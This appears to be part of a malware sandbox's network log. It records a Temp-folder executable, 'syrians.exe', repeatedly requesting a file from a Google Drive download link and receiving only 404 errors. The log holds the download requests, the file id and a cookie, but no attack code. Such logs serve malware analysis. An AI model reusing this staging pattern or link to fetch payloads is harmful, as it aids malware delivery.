2025-01-11 04:10:09 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:09 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-YOWqQcuQImgOxWWM6QVZiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	54062	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:10 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:10 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQWkfj8AepfxawyWkWJGSwC6q5voVuNXjh93cta3x7pIeBaEpFFsdZJ5JrsiogqUVOM Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:10 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-NT8LvLpQctzKIZ4GY1DYkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:10 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 55 39 62 44 68 59 44 64 54 2d 73 6a 41 4d 64 5a 75 49 43 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jU9bDhYDdT-sjAMdZuICvw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	54063	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:11 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:11 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:11 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-cIS-u7vBcvOVp3vul9sv0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	54064	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:12 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:12 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSV2WgLzjkI0c3eYUHKO10sJIu9iZSqnkV5g7RwbV3KUYAFQrxagqN19nC6NooD7m2W Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:12 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-taLJ3175q4B0-BxrblRU3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:12 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 7a 54 67 75 47 77 39 56 64 79 64 6f 37 33 77 58 73 56 4f 37 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="YzTguGw9Vdydo73wXsVO7g">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	54065	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:13 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:13 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:13 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-TYzSIwSVrY8GG_cic7TTaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	54066	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:14 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:15 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRBaELBUbRqchWf9W8xNublvqz8V89gPEAkZGu5KgBhN4hoshk95cGnjZGKPbQ6ECkv Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:14 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce--zFc8oEEJW_Kr9-JM-QQ7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:15 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 75 43 6b 51 54 62 45 34 74 61 6f 43 63 36 4b 74 70 39 4a 39 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TuCkQTbE4taoCc6Ktp9J9g">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	54067	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:15 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:16 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:16 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-LJbyIxUKNUihbUIHdErmTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	54068	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:16 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:17 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSrsdMJu0M8hZG-RkyeBAck4ktcNuDs0xV4MqIq4AJc_IqPTkmSaT-PDfto88w5WgtE Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:17 GMT Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-eomPmVcYkncr8swG06CPHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:17 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 7a 68 46 43 49 51 57 7a 4d 52 4f 6b 71 46 48 4e 32 73 47 56 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dzhFCIQWzMROkqFHN2sGVw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	54069	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:18 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
